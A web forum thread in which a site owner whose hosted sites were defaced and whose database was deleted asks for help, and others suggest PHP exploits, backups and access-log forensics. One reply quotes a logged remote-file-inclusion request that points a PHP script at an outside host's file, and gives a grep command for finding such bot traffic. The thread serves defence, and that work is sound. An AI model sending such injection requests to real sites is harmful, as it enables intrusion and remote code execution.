all of my sites hosted at dreamhost being hacked today by Www.AvciHack.Com, they changed my main pages and delete my database. I changed my FTP password but it is useless. plus, there is no visible strange file in my server as well. could anyone give me some advice how to deal with this? thanks a lot for your help.
Sounds like one of your PHP scripts got exploited. Make sure everything is up to date otherwise bots are going to exploit your sites time and time again.
Get a security company to check what actually happen and patch it before it is too late (if it is not too late)
What are the names and versions of the scripts you are using? Some might have security vulnerbilities.
php exploits have been a pain in the butt for me! Lost a valuable database to them last year. Now I backup every other day. I found wordpress has been an open door for hackers. They always change the config file and the index file.
This is most probably a php exploit...I fell foul to a wordpress hack when I was using the auto rss import script. The script imported a load of trojan which meant that every visitor to the site got a trojan. Received a complaint from the DC and had to close the account whilst I removed the offending script !
Have a look at the procedure there http://forums.digitalpoint.com/showthread.php?t=547049 same is valid for you as well 1. you really have to FIND the exact "door" of entry = vulnerability - hence you have to do access_log forensic research, by using grep/zgrep or by visual search of raw log lines no matter the size of log 2. wisdomtool's advice may be good but also may cost you thousands of $ ... if you had that amount you most likely would have invested such amount in network/cyber security workshop - there too are in range of multi k$ for a few days. since you did NOT - i assume you have NO such $ hence you have to sit down and do all on your own possible=successful = just a matter of time and by the end you will feel better because you start to understand your own site / scripts see also one of my most recent blog articles at http://www.kriyayoga.com/love_blog/post.php/891 you search for unusual log entries like one of today's most recent hacker attempts 84.246.4.133 - - [24/Nov/2007:08:09:15 +0800] "GET /love_blog/zboard//include/write.php?dir=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 403 1014 "-" "libwww-perl/5.803" hence you look among MANY other things for requests of existing or NON-existing URLs by automated scripts, attempts to UPLOAD/inject like in above example you may also look in a separate run - using grep/zgrep in your access_log / error_log files for user agent zgrep "libwww-perl" access_log-2007*.gz >>libwww-perl.txt adapt above bash line with your own exact access_log file name this writes output of grep / zgrep into file libwww-perl.txt this is but one of many ways hackers try to get into your "panty" !! but this is a very frequent way and apparently fully automated using a variety of known vulnerabilities across the planet. hence you find such GET requests for files you may never had - but you also may find some of SW/scripts you have ... calum's question is good but now you have to Google for every "script_name_you_have security alert" use above 3 keywords for G search BUT without quotes !! then you may find known and published security issues about any of your installed scripts you also may run a FULL nessus scan on your server - than only works if you have your OWN server - this again would show you possible KNOWN vulnerabilities on your server/site reformatting/reinstalling IS NO solution - hours or days all will be as is NOW !! you HAVE to search AND FIND !! no matter the time / efforts involved remember as a criteria of motivation the hackers did EXACTLY the same on your site - search and find - what "strangers" canb do - the owner needs to be able to do even faster, better and more efficiently !!! meanwhile you may at least disable any password login chmod 000 any and ALL URL-paths into login areas AND upload scripts DISABLE any and every upload of ANY kind of file !! txt, jpg, gif or whatever !!!!!!!
it is very unlikely that the host has time/money and resources to do the site owners job. typically the host controls server - server is the least danger to get hacked site owner in charge of all his installed SW = here is the greatest and typically the only danger to get hacked host would need to know all your SW/scripts which is very unlikely but the host may eventually assist you in giving access to ALL various log files needed to do all the forensic research needed - as outline in the posts a.m. to find your entry point and to thus secure your site.